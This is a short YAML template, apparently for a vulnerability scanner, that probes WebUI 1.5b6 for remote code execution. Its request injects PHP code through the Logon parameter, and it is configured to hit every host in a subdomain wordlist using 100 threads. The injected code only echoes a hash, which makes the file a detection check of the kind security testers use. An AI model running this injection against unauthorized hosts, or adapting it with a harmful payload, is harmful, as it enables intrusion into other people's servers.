id: webui-rce
info:
  name: WebUI 1.5b6 RCE
  author: pikpikcu
  severity: critical
  reference: https://www.exploit-db.com/exploits/36821
  tags: webui,rce

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27 HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "c5b3d7397a90f42d222f7ed9408c0dc6"
        part: body

      - type: status
        status:
          - 200